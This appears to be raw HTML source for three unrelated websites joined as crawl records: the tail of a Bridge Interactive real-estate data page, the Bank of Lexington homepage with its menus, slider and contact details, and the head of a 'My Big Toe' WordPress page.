<h2>It’s what you do with your data that will move you forward.</h2> </div> <div class="col-sm-6"> <p><img src="/wp-content/themes/bridgeinteractive/assets/img/icons/single-point.png" /></p> <h4><b>Bridge Listing Input</b></h4> <p><span style="font-weight: 400;">Uses clean design, machine learning and your business rules to make creating listings easier than ever before &#8211; with custom fields and absolutely no limits on photos.</span></p> <p><a href="http://www.bridgeinteractive.com/mls-topic-pagelisting-input/"><span style="font-weight: 400;">More about Bridge Listing Input</span></a></p> </div> <div class="col-sm-6"> <p><img src="/wp-content/themes/bridgeinteractive/assets/img/icons/data-distribution.png" /></p> <h4><b>BridgeAPI</b></h4> <p><span style="font-weight: 400;">A smart way to manage and grant access to your data that enables you to move faster and innovate more.</span></p> <p><a href="#"><span style="font-weight: 400;">More about BridgeAPI</span></a></p> </div> </div><!-- //task icons --> <!-- //link boxs --> <div class="blue-blocks container"> <div class="column-12 color-bg cobalt text-center"> <h3 class="color-white">Move faster, innovate more.</h3> <p class="color-white">Contact us to set up a demo and see how Bridge can take you where you want to go.<br class="small-medium-hide"/>&nbsp;</p> <div class="btn btn-clear schedule"> <a href="">Get in touch</a> </div> </div> </div> <!-- footer --> <footer> <div class="container"> <div class="col-lg-12 logo-row"> <img src="https://www.bridgeinteractive.com/wp-content/themes/bridgeinteractive/assets/img/[email protected]" class="logo"/> <div class="copyright"> <span class="small">&copy; 2019 Bridge Interactive.</span> <span class="small mobile-block">Owned and operated by Zillow Group.</span> </div> </div> <div class="col-lg-3 small-medium-hide col-md-3"> <h5>MLS</h5> <div class="menu-mls-container"><ul id="menu-mls-1" class="menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-140"><a href="https://www.bridgeinteractive.com/mls/">Overview</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-126"><a href="https://www.bridgeinteractive.com/mls/listing-input/">Listing Input</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-127"><a href="https://www.bridgeinteractive.com/mls/data-management/">Data Management</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-125"><a href="https://www.bridgeinteractive.com/mls/bridge-api/">BridgeAPI</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-128"><a href="https://www.bridgeinteractive.com/mls/agreement-management/">Agreement Management</a></li> </ul></div> </div> <div class="col-lg-3 small-medium-hide col-md-3"> <h5>Brokers</h5> <div class="menu-brokers-container"><ul id="menu-brokers-1" class="menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-135"><a href="https://www.bridgeinteractive.com/brokers/">Overview</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-137"><a href="https://www.bridgeinteractive.com/brokers/listing-input/">Listing Input</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-138"><a href="https://www.bridgeinteractive.com/brokers/bridge-api/">BridgeAPI</a></li> </ul></div> </div> <div class="col-lg-3 small-medium-hide col-md-3"> <h5>Developers</h5> <div class="menu-developers-container"><ul id="menu-developers-1" class="menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-133"><a href="https://www.bridgeinteractive.com/developers/">Overview</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-134"><a href="https://www.bridgeinteractive.com/developers/data-access/">Data Access</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-132"><a href="https://www.bridgeinteractive.com/developers/bridge-api/">BridgeAPI</a></li> </ul></div> <h5>Resources</h5> <div class="menu-resources-container"><ul id="menu-resources-1" class="menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-131"><a href="https://www.bridgeinteractive.com/resources/">Overview</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-130"><a href="https://www.bridgeinteractive.com/resources/rets-sdk/">RETS SDK</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-129"><a href="https://www.bridgeinteractive.com/resources/api-documentation/">BridgeAPI Documentation</a></li> </ul></div> </div> <div class="col-lg-3 col-md-3"> <h5 class="small-medium-hide">About</h5> <div class="menu-privacy-container"><ul id="menu-privacy-1" class="menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-124"><a href="https://www.bridgeinteractive.com/about/">About Us</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-123"><a href="https://www.bridgeinteractive.com/privacy-policy/">Privacy Policy</a></li> </ul></div> <p class="small">1100 Peachtree St NE Suite 300 <br/>Atlanta, GA 30309<br/>Email: [email protected]</p> </div> </div> </footer> <!-- //footer --> <!-- js --> <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script> <script async src="https://www.bridgeinteractive.com/wp-content/themes/bridgeinteractive/assets/js/bootstrap.min.js"></script> <script async type="text/javascript" src="https://www.bridgeinteractive.com/wp-content/themes/bridgeinteractive/assets/js/script.js"></script> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/www.bridgeinteractive.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}}; /* ]]> */ </script> <script type='text/javascript' src='https://www.bridgeinteractive.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.1'></script> <script type='text/javascript' src='https://www.bridgeinteractive.com/wp-content/themes/bridgeinteractive/js/navigation.js?ver=20151215'></script> <script type='text/javascript' src='https://www.bridgeinteractive.com/wp-content/themes/bridgeinteractive/js/skip-link-focus-fix.js?ver=20151215'></script> <script type='text/javascript' src='//app-sj01.marketo.com/js/forms2/js/forms2.min.js?ver=5.1.1'></script> <script type='text/javascript' src='https://www.bridgeinteractive.com/wp-content/plugins/marketo-form-widget/marketo-form-widget.js?ver=5.1.1'></script> <script type='text/javascript' src='https://www.bridgeinteractive.com/wp-includes/js/wp-embed.min.js?ver=5.1.1'></script> <script type="text/javascript">window.NREUM||(NREUM={});NREUM.info={"beacon":"bam.nr-data.net","licenseKey":"05c5d4f20c","applicationID":"125382279","transactionName":"M1RaZEMDXhJUUEFdWAoeeVNFC18PGlVHW1kQHEhRVgc=","queueTime":0,"applicationTime":1118,"atts":"HxNZEgsZTRw=","errorBeacon":"bam.nr-data.net","agent":""}</script></body> </html>
0
<!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <link rel="shortcut icon" href="https://bankoflexington.net/wp-content/themes/rational-start-child/favicon.ico" /> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="https://bankoflexington.net/xmlrpc.php"> <link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Merriweather"> <title>Bank of Lexington &#8211; People who know banking, People who know you</title> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Bank of Lexington &raquo; Feed" href="https://bankoflexington.net/index.php/feed/" /> <link rel="alternate" type="application/rss+xml" title="Bank of Lexington &raquo; Comments Feed" href="https://bankoflexington.net/index.php/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/bankoflexington.net\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.7.3"}}; !function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),!(j.toDataURL().length<3e3)&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,65039,8205,55356,57096),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,55356,57096),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55357,56425,55356,57341,8205,55357,56507),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55357,56425,55356,57341,55357,56507),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='parent-style-css' href='https://bankoflexington.net/wp-content/themes/rational-start/style.css?ver=4.7.3' type='text/css' media='all' /> <link rel='stylesheet' id='child-style-css' href='https://bankoflexington.net/wp-content/themes/rational-start-child/style.css?ver=1.0.0' type='text/css' media='all' /> <link rel='stylesheet' id='google-font-css' href='//fonts.googleapis.com/css?family=Raleway%3A400%2C700%7CInconsolata%7CSource+Sans+Pro&#038;ver=0.1' type='text/css' media='all' /> <link rel='stylesheet' id='rational-start-theme-style-css' href='https://bankoflexington.net/wp-content/themes/rational-start-child/style.css?ver=1' type='text/css' media='all' /> <link rel='stylesheet' id='abcfsl-staff-list-css' href='https://bankoflexington.net/wp-content/plugins/abcfolio-staff-list-pro/css/staff-list.css?ver=1.6.2' type='text/css' media='all' /> <script type='text/javascript' src='https://bankoflexington.net/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://bankoflexington.net/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://bankoflexington.net/wp-content/themes/rational-start/js/scripts.min.js?ver=0.1'></script> <link rel='https://api.w.org/' href='https://bankoflexington.net/index.php/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://bankoflexington.net/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://bankoflexington.net/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 4.7.3" /> <link rel="canonical" href="https://bankoflexington.net/" /> <link rel='shortlink' href='https://bankoflexington.net/' /> <link rel="alternate" type="application/json+oembed" href="https://bankoflexington.net/index.php/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fbankoflexington.net%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://bankoflexington.net/index.php/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fbankoflexington.net%2F&#038;format=xml" /> </head> <body class="home page-template page-template-front-page page-template-front-page-php page page-id-86" itemscope="itemscope" itemtype="http://schema.org/WebPage"> <a href="#content" class="btn btn-default off-screen">Skip to Content</a> <a name="top" id="top"></a> <div class="container"> <ul class="rational-widgets top"> </ul> </div> <header class="site" itemscope="itemscope" itemtype="http://schema.org/WPHeader" role="banner"> <div class="container"> <div class="row" style="padding-left: 10px; padding-right: 10px;"> <a class="logo col-sm-1 logo-img" href="https://bankoflexington.net"> <img alt="Bank of Lexington B.L. Logo" src="https://bankoflexington.net/wp-content/themes/rational-start-child/images/logo-bol.png" class="img-responsive"> </a> <a class="logo col-sm-6 logo-center" href="https://bankoflexington.net"> <div class="h3" itemprop="headline">Bank of Lexington</div> <p itemprop="description">People who know banking <i>People who know you</i></p> </a> <div class="logo col-sm-5 logo-right"> <a href="https://www.linkedin.com/company-beta/2010093/?pathWildcard=2010093"><img id="ln-pic" alt="LinkedIn f. logo button" src="https://bankoflexington.net/wp-content/themes/rational-start-child/images/ln.jpg " style="width: 37px;height: 37px;border-radius: 1px; padding-left:2px;"></a> <a href="https://www.facebook.com/BankofLexington"><img alt="Facebook f. logo button" src="https://bankoflexington.net/wp-content/themes/rational-start-child/images/fb.png " style="width: 35px;height: 35px;border-radius: 3px; padding-left:2px;"></a> <a href="https://www.netteller.com/bankoflexingtonky"><button type="button" class="btn btn-success">Online Banking <b>Login</b></button></a> </div> </div> <div class="row"> <button class="nav-site-toggle btn btn-block"><i class="fa fa-bars"></i> <span class="sr-only">Menu</span></button> <nav class="site col-sm-8 col-sm-offset-2" itemscope="itemscope" itemtype="http://schema.org/SiteNavigationElement" role="navigation" aria-label="Primary Navigation"> <ul id="menu-main-menu" class="menu"><li id="menu-item-88" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-86 current_page_item menu-item-88"><a href="https://bankoflexington.net/">Home</a></li> <li id="menu-item-344" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-344"><a href="/index.php/history/">About</a> <ul class="sub-menu"> <li id="menu-item-80" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-80"><a href="https://bankoflexington.net/index.php/history/">History</a></li> <li id="menu-item-168" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-168"><a href="https://bankoflexington.net/index.php/officers/">Officers</a></li> <li id="menu-item-171" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-171"><a href="https://bankoflexington.net/index.php/employees/">Employees</a></li> <li id="menu-item-174" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-174"><a href="https://bankoflexington.net/index.php/career-opportunities/">Career Opportunities</a></li> </ul> </li> <li id="menu-item-9" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-9"><a href="/index.php/checking/">Products &#038; Services</a> <ul class="sub-menu"> <li id="menu-item-486" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-486"><a href="https://bankoflexington.net/index.php/checking/">Personal</a> <ul class="sub-menu"> <li id="menu-item-183" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-183"><a href="https://bankoflexington.net/index.php/checking/">Checking</a></li> <li id="menu-item-186" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-186"><a href="https://bankoflexington.net/index.php/savings/">Savings</a></li> <li id="menu-item-190" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-190"><a href="https://bankoflexington.net/index.php/time-accounts/">Time Accounts</a></li> </ul> </li> <li id="menu-item-193" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-193"><a href="https://bankoflexington.net/index.php/business/">Business</a> <ul class="sub-menu"> <li id="menu-item-294" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-294"><a href="/index.php/business/#checking">Business Checking</a></li> <li id="menu-item-295" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-295"><a href="/index.php/business/#money-market">Business Money Market</a></li> </ul> </li> <li id="menu-item-201" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-201"><a href="https://bankoflexington.net/index.php/lending/">Lending</a> <ul class="sub-menu"> <li id="menu-item-292" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-292"><a href="/index.php/lending/#lending">Lending Products</a></li> <li id="menu-item-293" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-293"><a href="/index.php/lending/#mortgage">Mortgage Info</a></li> </ul> </li> <li id="menu-item-254" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-254"><a>Other Services</a> <ul class="sub-menu"> <li id="menu-item-260" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-260"><a href="https://bankoflexington.net/index.php/mastercard-debit-card/">MasterCard® Debit Card</a></li> <li id="menu-item-259" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-259"><a href="https://bankoflexington.net/index.php/credit-cards/">Credit Cards</a></li> <li id="menu-item-258" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-258"><a href="https://bankoflexington.net/index.php/mobile-banking/">Mobile Banking</a></li> <li id="menu-item-257" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-257"><a href="https://bankoflexington.net/index.php/online-banking/">Online Banking</a></li> <li id="menu-item-256" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-256"><a href="https://bankoflexington.net/index.php/switch-it-kit/">Switch IT Kit</a></li> </ul> </li> </ul> </li> <li id="menu-item-278" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-278"><a href="https://bankoflexington.net/index.php/offices/">Locations &#038; Hours</a> <ul class="sub-menu"> <li id="menu-item-10" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-10"><a href="/index.php/offices/#main-office">Main Office</a></li> <li id="menu-item-279" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-279"><a href="/index.php/offices/#tates-creek-branch">Tates Creek Branch</a></li> <li id="menu-item-280" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-280"><a href="/index.php/offices/#polo-club-branch">Polo Club Branch</a></li> <li id="menu-item-281" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-281"><a href="/index.php/offices/#surcharge">Surcharge Free ATM&#8217;s</a></li> </ul> </li> <li id="menu-item-12" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-12"><a href="/index.php/frequently-asked-questions/">FAQs</a> <ul class="sub-menu"> <li id="menu-item-327" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-327"><a href="https://bankoflexington.net/index.php/frequently-asked-questions/">Frequently Asked Questions</a></li> <li id="menu-item-325" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-325"><a href="https://bankoflexington.net/index.php/mobile-deposit-questions/">Mobile Deposit Questions</a></li> <li id="menu-item-328" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-328"><a href="https://bankoflexington.net/index.php/terms-of-service-and-privacy-policy-statements/">Terms and Privacy Statements</a></li> <li id="menu-item-324" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-324"><a href="https://bankoflexington.net/index.php/fraud-alerts/">Fraud Alerts</a></li> <li id="menu-item-584" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-584"><a href="https://bankoflexington.net/index.php/conversionfaq/">System Conversion Questions</a></li> </ul> </li> <li id="menu-item-333" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-333"><a href="https://bankoflexington.net/index.php/contact/">Contact</a></li> </ul> </nav> </div> </div> </header> <div class="container"> </div> <div id="content" class="container" itemprop="mainContentOfPage" itemscope="itemscope" itemtype="http://schema.org/Blog" role="main"> <article class="post-86 page type-page status-publish hentry" itemscope="itemscope" itemtype="http://schema.org/BlogPosting" itemprop="blogPost"> <header class="article"> <h2 class="h1" itemprop="headline"><a href="https://bankoflexington.net/">Proud to Call Lexington Home</a></h2> </header> <footer class="article negative-margin" role="contentinfo"> <ul class="list-unstyled article-meta"> <li><i class="fa fa-calendar"></i> <time datetime="2016-12-24 06:10" itemprop="datePublished">December 24, 2016</time> </li> <li itemscope="itemscope" itemtype="http://schema.org/Person" itemprop="author"><i class="fa fa-user"></i> <a href="https://bankoflexington.net/index.php/author/trex/" title="Posts by trex" rel="author">trex</a> </li> </ul> </footer> <!-- meta slider --> <div style="width: 100%;" class="metaslider metaslider-flex metaslider-454 ml-slider nav-hidden"> <style type="text/css" id="metaslider-css-454"> #metaslider_454.flexslider .slides li {margin-right: 5px !important;} </style> <div id="metaslider_container_454"> <div id="metaslider_454"> <ul class="slides"> <li style="display: none; width: 100%;" class="slide-37 ms-image"><img src="https://bankoflexington.net/wp-content/uploads/2016/12/BOL_EXT_WIDE-355x220.jpg" height="220" width="355" alt="Photo of bank building exterior with B.L. logo on stone wall" class="slider-454 slide-37" /></li> <li style="display: none; width: 100%;" class="slide-39 ms-image"><img src="https://bankoflexington.net/wp-content/uploads/2016/12/BOL_HOME_BUILDING-355x220.jpg" height="220" width="355" alt="Photo of three people looking at building plans" class="slider-454 slide-39" /></li> <li style="display: none; width: 100%;" class="slide-38 ms-image"><img src="https://bankoflexington.net/wp-content/uploads/2016/12/BOL_Gatti_2-355x220.jpg" height="220" width="355" alt="Photo of two men looking at a document" class="slider-454 slide-38" /></li> <li style="display: none; width: 100%;" class="slide-41 ms-image"><img src="https://bankoflexington.net/wp-content/uploads/2016/12/bol-home-10-355x220.jpg" height="220" width="355" alt="Photo of bank windows with frosted glass B.L. logo" class="slider-454 slide-41" /></li> <li style="display: none; width: 100%;" class="slide-40 ms-image"><img src="https://bankoflexington.net/wp-content/uploads/2016/12/BOL_PRIVE1-355x220.jpg" height="220" width="355" alt="Photo of two bank staff members talking" class="slider-454 slide-40" /></li> <li style="display: none; width: 100%;" class="slide-43 ms-image"><img src="https://bankoflexington.net/wp-content/uploads/2016/12/bol-home-355x220.jpg" height="220" width="355" alt="Photo of staff members smiling and on the phone" class="slider-454 slide-43" /></li> <li style="display: none; width: 100%;" class="slide-42 ms-image"><img src="https://bankoflexington.net/wp-content/uploads/2016/12/bol-home-11-355x220.jpg" height="220" width="355" alt="Photo of bank staff consulting a business owner" class="slider-454 slide-42" /></li> <li style="display: none; width: 100%;" class="slide-44 ms-image"><img src="https://bankoflexington.net/wp-content/uploads/2016/12/bol-home2-301x187.jpg" height="220" width="355" alt="Photo of a family in front of a newly purchased home" class="slider-454 slide-44" /></li> </ul> </div> </div> <script type="text/javascript"> var metaslider_454 = function($) { $('#metaslider_454').addClass('flexslider'); // theme/plugin conflict avoidance $('#metaslider_454').flexslider({ slideshowSpeed:3000, animation:'slide', controlNav:false, directionNav:false, pauseOnHover:true, direction:'horizontal', reverse:false, animationSpeed:900, prevText:"&lt;", nextText:"&gt;", easing:"linear", slideshow:true, itemWidth:355, minItems:1, itemMargin:5 }); }; var timer_metaslider_454 = function() { var slider = !window.jQuery ? window.setTimeout(timer_metaslider_454, 100) : !jQuery.isReady ? window.setTimeout(timer_metaslider_454, 1) : metaslider_454(window.jQuery); }; timer_metaslider_454(); </script> </div> <!--// meta slider--> <p>As our name implies, we’re a local bank with a vested interest in our neighbors and Lexington. That’s the way it’s been since 2006, when we opened our first bank on Harrodsburg Road. Now with three locations, we’ve grown to meet the growing financial needs of our community. From home mortgages, business accounts and free checking to mobile and Internet banking, Bank of Lexington offers a full range of products and services. How can we help you? Stop in and discover the friendly, personalized service from Bank of Lexington.</p> <ul style="line-height:22px;"> <li><strong>Needing a Mortgage Loan?</strong>  Whether you are purchasing a home or refinancing your current mortgage, Bank of Lexington has the right products and best rates available for you.  <a href="https://bestkentuckyhomeloans.mymortgage-online.com/">Click here for more information or to apply online</a>.</li> <p></p> <li><strong>FREE ATM WITHDRAWALS!</strong> Available at any SUM ATM located throughout the country, with more than 15 locations in Fayette and surrounding counties. Visit <a href="http://www.sum-atm.com/">http://www.sum-atm.com/</a> to find a SUM ATM near you! (Bluegrass Cash ATMs are no longer surcharge free)</li> <p></p> <li><strong>QUICKEN/QUICKBOOKS WEBCONNECT IS NOW AVAILABLE!</strong> Download account transaction history from online banking directly into Quicken or QuickBooks.</li> <p></p> <li><strong>Bank of Lexington MoBOL Deposit!</strong> Deposit checks anytime, anywhere using your Bank of Lexington mobile app.<br /> <a href="http://bol.msrtech.net/index.php/mobile-banking/">Click here for more information</a></li> </ul> <nav class="extras"> <button class="share fa fa-share-alt" title="Proud to Call Lexington Home" href="https://bankoflexington.net/"> <span class="sr-only">Share</span></button> </ul> </nav> </article> <nav class="pagination"><ul ></nav> </div> <style> .breadcrumb{ display:none } </style> <footer class="site" itemscope="itemscope" itemtype="http://schema.org/WPFooter"> <div class="container"> <div class="row"> <div class="col-md-6"> <div class="rational-widgets footer-copyright"> <div id="text-2" class="widget widget_text"> <div class="textwidget"><div style="padding-top:5px;">Copyright &copy; <a href="https://documents.bankoflexington.net/View/Login.aspx?ReturnUrl=/Default.aspx" style="color: white;">Bank of Lexington</a> | <a href="http://bankoflexington.net/index.php/terms-of-service-and-privacy-policy-statements/" style="color: white;">Terms of Service | Privacy</a> | <a href="http://bankoflexington.net/index.php/terms-of-service-and-privacy-policy-statements/#Accessibility" style="color: white;">Accessibility</a></div></div> </div> </div> </div> <div class="col-md-6"> <ul class="rational-widgets footer-beside-copyright row"> <li id="text-3" class="widget widget_text"> <div class="textwidget"><div style="font-size: 9px; line-height: 14px; padding-top:5px; padding-bottom: 10px;">Links to third-party web sites are provided for convenience only. Bank of Lexington does not endorse nor support the content of third-party links. Bank of Lexington is not responsible for the content of a third-party website. By clicking on a third-party link, you will leave the Bank of Lexington website. Privacy and security policies may differ from those practiced by Bank of Lexington.</div></div> </li> </ul> </div> </div> <div class="row"> <ul class="rational-widgets footer row"> <li id="nav_menu-3" class="widget widget_nav_menu col-sm-4"><h2 class="h3">Recent Documents</h2><div class="menu-recent-documents-container"><ul id="menu-recent-documents" class="menu"><li id="menu-item-400" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-400"><a href="https://bankoflexington.net/wp-content/uploads/2019/04/DEPOSIT-RATE-SHEET.pdf">Deposit Rates [PDF]</a></li> <li id="menu-item-408" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-408"><a href="https://bankoflexington.net/wp-content/uploads/2019/04/Stmt-of-Condition-Mar-19.pdf">Statement of Condition March 2019 [PDF]</a></li> <li id="menu-item-410" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-410"><a href="https://bankoflexington.net/wp-content/uploads/2018/05/Privacy-Policy-52018-1.pdf">Annual Privacy Policy Update [PDF]</a></li> <li id="menu-item-412" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-412"><a href="/wp-content/uploads/2017/03/Fee-Schedule.pdf">Fee Schedule [PDF]</a></li> </ul></div></li><li id="text-4" class="widget widget_text col-sm-4"> <div class="textwidget"><img src="/wp-content/uploads/2017/01/FDIC2.gif" alt="Member FDIC Equal Housing Lender Badge"> <img style="padding-left:10px; padding-top:20px;" src="/wp-content/uploads/2017/01/bbb-logo-1.png" alt="Better Business Bureau Accredited Business Badge"></div> </li><li id="text-5" class="widget widget_text col-sm-4"><h2 class="h3">Contact Us</h2> <div class="textwidget"><ul class=menu" style="line-height:25px;"> <li class="menu-item">761 Corporate Drive | 859.219.2900</li> <li>866 Malabu Drive | 859.219.2950</li> <li>6409 Polo Club Lane | 859.219.2930</li> <li><a href="/index.php/contact/">More Information</a></li></div> </li> </ul> </div> </div> </footer> <a href="#top" class="back-to-top btn btn-default btn-inverse"><i class="fa fa-angle-up"></i> <span class="sr-only">Back to Top</span></a> <script> var backToTop = document.querySelector('.back-to-top'); var headroom = new Headroom(backToTop); headroom.init(); </script> <div class="overlay"></div> <div class="modal modal-share"> <button class="btn btn-link modal-close"><i class="fa fa-times"></i><span class="screen-reader-text">Close</span></button> <div class="modal-frame"> <h3>Share</h3> <div class="content"></div> </div> </div> <script src="https://bankoflexington.net/wp-content/themes/rational-start-child/mobile_menu.js "></script> <link rel='stylesheet' id='metaslider-flex-slider-css' href='https://bankoflexington.net/wp-content/plugins/ml-slider/assets/sliders/flexslider/flexslider.css?ver=3.5' type='text/css' media='all' property='stylesheet' /> <link rel='stylesheet' id='metaslider-public-css' href='https://bankoflexington.net/wp-content/plugins/ml-slider/assets/metaslider/public.css?ver=3.5' type='text/css' media='all' property='stylesheet' /> <script type='text/javascript' src='https://bankoflexington.net/wp-includes/js/comment-reply.min.js?ver=4.7.3'></script> <script type='text/javascript' src='https://bankoflexington.net/wp-includes/js/wp-embed.min.js?ver=4.7.3'></script> <script type='text/javascript' src='https://bankoflexington.net/wp-content/plugins/ml-slider/assets/sliders/flexslider/jquery.flexslider-min.js?ver=3.5'></script> <script type='text/javascript' src='https://bankoflexington.net/wp-content/plugins/ml-slider/assets/easing/jQuery.easing.min.js?ver=3.5'></script> </body> </html>
0
<!DOCTYPE html> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>Home - My Big Toe</title> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="https://www.my-big-toe.com/xmlrpc.php"> <script>window._wca = window._wca || [];</script> <!-- This site is optimized with the Yoast SEO plugin v11.0 - https://yoast.com/wordpress/plugins/seo/ --> <link rel="canonical" href="https://www.my-big-toe.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Home - My Big Toe" /> <meta property="og:url" content="https://www.my-big-toe.com/" /> <meta property="og:site_name" content="My Big Toe" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://www.my-big-toe.com/#website","url":"https://www.my-big-toe.com/","name":"My Big Toe","publisher":{"@id":"https://www.my-big-toe.com/#organization"},"potentialAction":{"@type":"SearchAction","target":"https://www.my-big-toe.com/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"https://www.my-big-toe.com/#webpage","url":"https://www.my-big-toe.com/","inLanguage":"en-US","name":"Home - My Big Toe","isPartOf":{"@id":"https://www.my-big-toe.com/#website"},"about":{"@id":"https://www.my-big-toe.com/#organization"},"datePublished":"2014-11-27T18:54:36+00:00","dateModified":"2014-11-27T18:54:36+00:00"}]}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' 